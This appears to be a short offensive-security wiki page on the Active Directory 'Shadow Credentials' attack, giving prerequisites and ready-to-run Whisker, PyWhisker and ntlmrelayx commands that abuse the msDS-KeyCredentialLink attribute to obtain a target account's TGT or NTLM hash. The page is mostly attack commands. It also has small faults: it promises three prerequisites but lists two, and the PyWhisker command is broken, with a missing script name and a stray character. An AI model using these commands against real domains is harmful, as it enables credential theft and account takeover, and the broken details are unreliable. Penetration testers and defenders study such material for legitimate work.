Shadow Credentials

Before jumping into exploiting Shadow Credentials, I highly recommend reading the article from SpecterOps on shadow credentials.


There are three prerequisites for this attack to be performed:

  • The ability to write to the msDS-KeyCredentialLink attribute on the target.

  • A DC on the domain must be configured to support PKINIT.


After identifying a user account or machine account where the msDS-KeyCredentialLink attribute can be written to, Whisker can be used to essentially automate the exploitation from a Windows machine:

# Generic usage of Whisker
Whisker.exe add /target:parzival

# Generic usage of PyWhisker -d $domain -u $user -p $password --target $target --action "list"x

Following running Whisker, it will provide a Rubeus command that can be executed in order to pull the targets TGT or NTLM hash.


Ntlmrelayx also supports exploiting shadow credentials and can be used as follows:

# Relaying will work against either LDAP or LDAPS

ntlmrelayx -t ldaps://parz-dc1 --shadow-credentials --shadow-target 'parz-dc2'

ntlmrelayx -t ldap://parz-dc1 --shadow-credentials --shadow-target 'parz-dc2'

## Failing to specify the --shadow-target will attempt to obtain a hash for the relayed user. 
ntlmrelayx -t ldap://parz-dc1 --shadow-credentials


Last updated